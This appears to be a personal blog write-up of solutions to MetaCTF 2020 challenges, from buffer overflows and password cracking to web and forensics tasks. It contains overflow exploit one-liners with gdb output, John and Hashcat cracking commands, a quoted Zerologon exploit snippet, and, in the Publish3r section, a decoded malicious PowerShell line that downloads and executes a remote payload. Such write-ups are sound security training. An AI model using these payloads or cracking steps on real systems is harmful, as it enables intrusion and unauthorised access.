MetaCTF 2020

Find all source files on my GitHub repository: https://git.landon.pw/r/capture-the-flag/tree/main/metactf/2020

Binary Exploitation

Baffling Buffer 0 - 150pts

Tools: python, netcat

While hunting for vulnerabilities in client infrastructure, you discover a strange service located at host1.metaproblems.com 5150. You’ve uncovered the binary and source code code of the remote service, which looks somewhat unfinished. The code is written in a very exploitable manner. Can you find out how to make the program give you the flag?

When analyzing the bb0.c file, I noticed a char array, ‘buf’ is created, consisting of 48 bytes. The ‘vuln()’ function then uses ‘gets’ to write into the buffer. Thus, a simple buffer overflow attack can be done using:

1python3 -c "print('a'*100)" | ncat host1.metaproblems.com 5150

Baffling Buffer 1 - 225pts

Tools: python, netcat, gdb

After pointing out the initial issue, the developers issued a new update on the login service and restarted it at host1.metaproblems.com 5151. Looking at the binary and source code, you discovered that this code is still vulnerable.

Looking at the source code, we notice that the flag is in an entirely different function, ‘win()’. This means we will have to use a shellcode overflow in order to call that function. If we look at the ‘vuln()’ function, we notice a ‘strcmp’ between the buffer and “Sup3rs3cr3tC0de”. Per the C docs:

“This function starts comparing the first character of each string. If they are equal to each other, it continues with the following pairs until the characters differ or until a terminating null-character is reached.”

We can try to trick the ‘strcmp’ call by adding a null-terminating character to “Sup3rs3cr3tC0de” and then adding our overflow data.

First, I simply ran bb1 with “Sup3rs3cr3tC0de”, a null-terminator, and some extra characters to see if it would segfault.

1python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*50)" | ./bb1

As I thought, it segfaulted. Thus, we can modify our input to write over the return value and access the ‘win()’ function. First, we have to find that memory address though. This can be done using GDB.

1$ gdb bb1
2(gdb) break main
3(gdb) run
4(gdb) info address win
5>> Symbol "win" is at 0x401172 in a file compiled without debugging.

Now, it’s a bit of trial and error to find the correct value to overflow. We also need to enable core dumps that way we can check where exactly the program segfaults at.

1$ ulimit -c unlimited
2$ python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*41)" | ./bb1
3>> Access granted!
4>> zsh: done                              python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*41)" |
5>> zsh: segmentation fault (core dumped)  ./bb1
6$ gdb -q -c core -ex quit
7>> Core was generated by ./bb1.
8>> Program terminated with signal SIGSEGV, Segmentation fault.
9>> #0  0x0000000000400061 in ?? ()

From here, we can see that the program terminates at 0x400061. 61 is the ASCII representation of ‘a’. So, we have one too many A’s being input. All we have to do is change to print 40 a’s and then append our address in hex.

1$ python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*40+'\x72\x11\x40')" | ncat host1.metaproblems.com 5151
2>> Access granted!

And we retrieved our flag.

Cryptography

Crypto Stands for Cryptography - 100 pts

Welcome to the crypto team! We help consult in a variety of areas around the security department, helping to make sure our company is using proper encryption, data storage, and data transfer mechanisms. The data security team said they currently use something called Base64 to “encrypt” data. They want to know if that’s a secure way to store sensitive data, and provided a sample of data: TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ== Is it secure? Can you crack it?

The flag for this challenge can be found by decoding the base64 string.

1echo "TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==" | base64 --decode

ROT-26 - 150pts

Tools: dCode

We’ve applied some encoding to obfuscate our messages. There’s no way you can figure out the original message now?! I applied the unbreakable ROT 26 algorithm: g!0{]n`7*+0y~+1|(!y.+0yKM9

The flag can be decoded from the ROT-26 string by simply using an online decoder such as Dcode.fr.

Welcome to the Obfuscation Games - 175pts

During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!

1$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Looking at the PowerShell script, we notice it takes a base64 string as a MemoryStream, and then creates a Gzip file using the memory stream. It then attempts to execute the decompressed gzip file using ‘iex()’. Running the PowerShell code reveals that the flag is in the payload. We can simply pipe the decoded base64 string into a gz file, and then gunzip the file.

1echo "H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA" | base64 --decode > meta.gz

Then, we can decompress the gzip and simply view the file contents.

1gunzip meta.gz
2cat meta

The Last Great Zip File - 200pts

Tools: JohnTheRipper

Help! I’ve created a zip archive that contains my favorite flag, but I forgot the password to it. Can you help me recover my flag back? You may need to use another program such as wget to download the file if your browser is blocking the download. Now to get the password hash from the zip file…

We can use zip2john to convert the encrypted zip file to a format that can be cracked by John.

1zip2john flag.zip > hash

Then, we can use John alongside rockyou.txt to crack the password.

1john --format=PKZIP --wordlist=/usr/share/wordlists/rockyou.txt hash

This will reveal the zip password to be “Soldat*13” which allows us to open the zip and reveal the flag.

Board Meeting Gone Wrong - 325pts

Tools: Python, JohnTheRipper, Hashcat

I stole this sensitive document that contains some really important board notes. I have a feeling I can get some serious insight on stonks here. There are a few things I know about the person I stole it from. He likes animals, he likes to speak like he’s a hacker to make himself seem cool, and he was born in 1972. I hope that helps. Can you help me crack it? I will make sure to share some of the profits.

I began by finding a basic animal wordlist. I found this and downloaded it.

1wget https://github.com/sroberts/wordlists/blob/master/animals.txt

Then, I needed to convert the animals into leetspeak. I created a Python script to do this.

 1leet = {
 2    'a': '@',
 3    'e': '3',
 4    'i': '1',
 5    'o': '0',
 6    's': '5',
 7    't': '7'
 8}
 9out = open("out.txt", 'a')
10with open("animals.txt") as f:
11    for line in f:
12        line.strip()
13        replaced = ""
14        for c in line:
15            if c in leet:
16                replaced += leet.get(c)
17            elif c == '\n':
18                replaced += "1972" + "\n"
19            else:
20                replaced += c
21        out.write(replaced)

This script opens animals.txt and replaces characters based on their keypairs in the leet dictionary. It then appends 1972 to the end of the string and writes it to out.txt.

Now, we have our wordlist. We must prepare Board_Meeting_Notes.docx for cracking. First, we will use office2john to create a hash for the docx file. Running

1office2john out.txt > hash

will give us our hash file. Then, we can use Hashcat to crack the hash. (You could also use John, but I decided to use Hashcat as I used John in the last password cracking challenge.)

1$ hashcat -a 0 -m 9600 hash out.txt
2>> $office$*2013*100000*256*16*e6e06de5805713d9d971f4bcb249e0c6*34a42cf8762b521292400e6854d4be75*a1a5a0a3b7038ab0fd37115744a0ca264e4f88a33110bed83440ca9668e9b138:d0lph1n1972

We can then use the cracked password to open the docx and obtain the flag.

Reconnaissance

Big Breaches - 150pts

How many unique emails were exposed in the biggest single collection of breached usernames/passwords? Provide the answer (flag) in the format MetaCTF{###,###}

The ‘Collection #1’ databreach is the biggest collection of breached usernames and passwords. Troy Hunt has a page dedicated to Collection #1: https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/. If we take a look through the information, we can find the number of unique emails breached.

Not So Itsy Bitsy Spider - 200pts

Recent reporting indicates that a prominent ransomware operator, known as WIZARD SPIDER, was able to deploy Ryuk ransomware in an environment within 5 hours of compromise. What recent, critical vulnerability was exploited in this environment to gain elevated privileges? The flag will be in the following format: CVE-XXXX-XXXX

I began looking for the answer by searching “Ryuk ransomware CVE 2021” and found CVE-2021-40444, which attacks Microsoft Office. However, that flag was incorrect. I then realized the challenge is from 2020, not 2021, so “latest” would refer to 2020 CVE’s. If we Google “Ryuk ransomware CVE” we can find a list of all known exploits that were used to infect systems with Ryuk (https://cybersecurity.bd.com/bulletins-and-patches/ryuk-ransomware) and we will find the most “recent” CVE.

Diving Into The Announcement - 225pts

Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept (POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. Recently, Microsoft announced CVE-2020-1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.

CVE-2020-1472 (“Zerologon”): “An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller”

VoidSec has a published checker and exploit code here. Taking a look at their cve-2020-1472-exploit.py, we will find their attempt to authenticate using the vulnerability:

1try:
2    server_auth = nrpc.hNetrServerAuthenticate3(
3        rpc_con, dc_handle + "\x00", target_computer + "$\x00",
4        nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
5                 target_computer + "\x00", ciphertext, flags
6    )

Thus, the vulnerable function (and our flag) is hNetrServerAuthenticate3.

Reverse Engineering

REDACTED - 225pts

Tools: Photoshop

The CEO of Cyber Corp has strangely disappeared over the weekend. After looking more into his disappearance Local Police Department thinks he might have gotten caught up into some illicit activities. The IT Department just conducted a search through his company-provided laptop and found an old memo containing a One Time Password to log into his e-mail. However it seems as if someone has redacted the code, can you recover it for us?

For this challenge, I used Adobe Photoshop. I’m not sure if there’s a similar method using other alternatives such as Gimp or Affinity, but I would assume there should be.

First, I opened cybercorp_memo.pdf using Photoshop. Then, an ‘Import PDF’ dialog box opened, allowing me to configure the way the PDF was imported. On the ‘Select’ option, rather than choosing ‘Pages’, I chose ‘Images.’ This will allow you to extract the layer below the black box. Photoshop

Once you load the PDF that way, the flag will be revealed.

Web Exploitation

High Security Fan Page - 125pts

Uh oh, I woke up to hear that some Swifties seem to have sabotaged my Katy Perry fan page! After writing about why KP is clearly the better artist, I believe they hacked into the system and somehow changed my password! I need to publish a big story today before TMZ steals my scoop, however I can’t find my way back into the admin panel. Can you please help me out by finding my password so I can get back to work? Note: obviously most sites aren’t built like this, but it’s good to get familiar with examining how a website’s source code looks, how resources get loaded in, etc :) https://metaproblems.com/a3263ca2855a26f06bd679ac3e240af9/

While checking the requests made upon attempting to login, you will notice no requests are actually made. Thus, the login verification must be client-side. Checking the resources of the webpage, there is a framework.js JavaScript file that contains the username and password to login.

Barry’s Web Application - 150pts

I’ve made this cool new web application that I plan to use to host a blog. Please check it out at http://host1.metaproblems.com:5620/ Right now it’s still currently being built, but I hope you enjoy what’s there so far!

Browsing to Barry’s website, we will see we are redirected to http://host1.metaproblems.com:5620/dev/webapp/index.html. A simple directory traversal to http://host1.metaproblems.com:5620/dev, and we will find a docs folder containing the flag.

Cookies are used by websites to keep track of user sessions and help with authentication. Can you spot the issue with this site and convince it that you’re authenticated? https://metaproblems.com/e7fce2f2fcac584b49fe615b11784ff3/

After attempting to enter the secret code, a cookie called ‘cm_authenticated’ is cached, with a value of 0. Setting the file of the cookie to 1 and refreshing the page will authenticate your account.

Forensics

Forensics101 - 100pts

Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file. What is the ASCII representation of the magic bytes for a RAR archive?

If we look at the Wikipedia page for the list of file signatures; https://en.wikipedia.org/wiki/List_of_file_signatures, we can find the signature for RAR archives.

Staging in 1… 2… 3 - 150pts

The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken. There was a suspicious file created during the timeframe of Threat Actor activity: C:\123.tmp. Can you check it out?

To find the flag, the file can be analyzed using

1strings 123.tmp

Publish3r - 225pts

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://………} Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is metactf

After unzipping the 7zip archive, we are presented Publish3r.pub. Let’s take a look at the file contents using strings Publish3r.pub. If we go through all the strings, one stands out from the rest:

1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -windowstyle hidden -enc SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==

Here we have a PowerShell script. with the actual script itself being base64 encoded. Let’s decode this using

1echo "SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==" | base64 --decode

And we can see the actual PowerShell script being executed:

1IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

Open Thermal Exhaust Port - 275pts

Tools: Wireshark

Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are? The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.

Let’s open nmap_scan.pcapng using Wireshark. We can apply the following filter tcp.flags.ack == 1 && tcp.flags.syn == 1 to filter only the packets that did a SYN-ACK handshake. Then, the ports can be summed to find the flag.